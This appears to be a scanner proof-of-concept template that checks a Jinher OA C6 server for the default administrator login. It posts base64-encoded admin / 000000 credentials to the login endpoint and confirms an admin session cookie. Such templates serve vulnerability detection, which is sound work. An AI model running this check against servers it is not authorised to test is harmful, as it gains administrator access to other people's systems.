name: poc-yaml-jinher-oa-c6-default-password
manual: true
transport: http
rules:
  jiner:
    request:
      cache: true
      method: POST
      path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
      body:
        type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&
    expression: response.status == 200 && response.headers["Set-Cookie"].contains("SessionIDAdmin=") && response.body.bcontains(b"\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c") && response.body.bcontains(b"\xc4\xfa\xba\xc3\x7c\x7c\x7c")  # nolint[:cellint]
expression: jiner()
detail:
  author: iak3ec(https://github.com/nu0l)
  links:
    - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
